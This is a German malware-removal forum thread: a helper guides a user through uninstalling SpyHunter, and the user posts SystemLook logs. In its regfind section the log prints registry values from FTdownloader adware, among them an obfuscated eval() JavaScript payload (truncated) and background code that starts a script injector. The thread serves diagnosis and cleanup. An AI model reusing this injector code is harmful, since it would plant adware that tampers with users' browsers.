[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayIcon"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"

-= EOF =-

cosinus 13.08.2013 09:44
SpyHunter entfernen

Die folgende Datei hilft dir das Programm restlos zu deinstallieren:
  • Lade dir bitte die folgendes Programm auf deinen Desktop: SpyHunterKiller.exe
  • Bestätige die Warnung und klicke Weiter.
  • Berichte, ob du noch Reste von SpyHunter sehen kannst.


Wiederhole bitte auch den Schritt mit Systemlook und poste davon die neuen Ergebnisse

Minter 13.08.2013 12:00
Bei Systemsteuerung -> Programme und Funktionen habe ich noch mal was mit dem Namen SpyHunter gefinden. Hat aber nicht das Icon von SpyHunter

Code:
SystemLook 30.07.11 by jpshortstuff
Log created at 10:48 on 13/08/2013 by Moritz
Administrator - Elevation successful

========== filefind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll        --a---- 393216 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe        --a---- 338432 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll        --a---- 473088 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe        --a---- 442880 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\Program Files (x86)\FTdownloader V4.0\FTdownloader V4.0.ico        --a---- 9662 bytes        [11:19 30/06/2013]        [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk        --a---- 726 bytes        [07:36 13/08/2013]        [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader        --a---- 4256 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler        --a---- 4166 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job        --a---- 1226 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] 3FB5E9A85AA0F499D86530241DACB64B
C:\Windows\Tasks\FTdownloader V4.0-enabler.job        --a---- 1136 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] FF2CF9A43027FE63CBF838105BF502B4
C:\Windows\Tasks\FTdownloader V4.0-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [07:27 13/08/2013] F62D368B093CC484B99E203338E25C37

Searching for "*Spyhunter*"
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\SpyHunter.lnk        --a---- 12130 bytes        [13:26 12/08/2013]        [13:26 12/08/2013] 7FB1162DAB9E2DA90C88CCECD0C87808
C:\Users\Moritz\Downloads\SpyHunterKiller.exe        ------- 463693 bytes        [08:46 13/08/2013]        [08:46 13/08/2013] 82717E3F11623215BE019760252C4E03
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf        --a---- 165806 bytes        [17:24 27/07/2013]        [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8

========== folderfind ==========

Searching for "*FTdownloader*"
C:\Program Files (x86)\FTdownloader V4.0        d------        [12:15 26/07/2013]
C:\Users\Moritz\AppData\Local\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou        d------        [12:15 26/07/2013]

Searching for "*Spyhunter*"
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]

========== regfind ==========

Searching for "FTdownloader"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==\\\"0\\\"){4S()}1O if(a.2V!=\\\"1\\\"||
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
@="FTDownloader URI"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader]
"Content Type"="application/x-FTDownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\DefaultIcon]
@="C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FTDownloader\shell\open\command]
@=""C:\Program Files (x86)\FTDownloader.com\FTDownloader.exe" /u="%1""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FTdownloader V4.0]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp]
"path"="C:\Program Files (x86)\FTDownloader.com\FTDownloader10.crx"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0]
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Code]
"BgJavaScript"="

/************************************************************************************
  This is your background code.
  For more information please visit our wiki site:
  hxxp://docs.crossrider.com/#!/guide/scopes_background
*************************************************************************************/

appAPI.ready(function($) {
        var version="4.0";
        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
